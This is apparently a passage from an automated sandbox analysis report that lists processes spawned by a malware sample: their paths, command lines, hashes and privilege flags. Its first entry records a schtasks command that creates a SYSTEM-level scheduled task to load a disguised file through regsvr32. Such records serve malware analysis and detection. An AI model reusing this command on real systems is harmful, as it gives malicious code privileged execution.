                                                                                                                                                          Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn frjwqvc /tr 'regsvr32.exe -s \'C:\Users\user\ritofm.cvm\'' /SC ONCE /Z /ST 13:34 /ET 13:46
                                                                                                                                                          Imagebase:0xb40000
                                                                                                                                                          File size:185856 bytes
                                                                                                                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:13:32:52
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff724c50000
                                                                                                                                                          File size:625664 bytes
                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:13:32:54
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
                                                                                                                                                          Imagebase:0x7ff7585d0000
                                                                                                                                                          File size:24064 bytes
                                                                                                                                                          MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:13:32:55
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline: -s 'C:\Users\user\ritofm.cvm'
                                                                                                                                                          Imagebase:0x1200000
                                                                                                                                                          File size:20992 bytes
                                                                                                                                                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:13:32:57
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 652
                                                                                                                                                          Imagebase:0xfc0000
                                                                                                                                                          File size:434592 bytes
                                                                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:13:34:00
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
                                                                                                                                                          Imagebase:0x7ff7585d0000
                                                                                                                                                          File size:24064 bytes
                                                                                                                                                          MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:13:34:01
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline: -s 'C:\Users\user\ritofm.cvm'
                                                                                                                                                          Imagebase:0x1200000
                                                                                                                                                          File size:20992 bytes
                                                                                                                                                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:13:34:03
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 652
                                                                                                                                                          Imagebase:0xfc0000
                                                                                                                                                          File size:434592 bytes
                                                                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
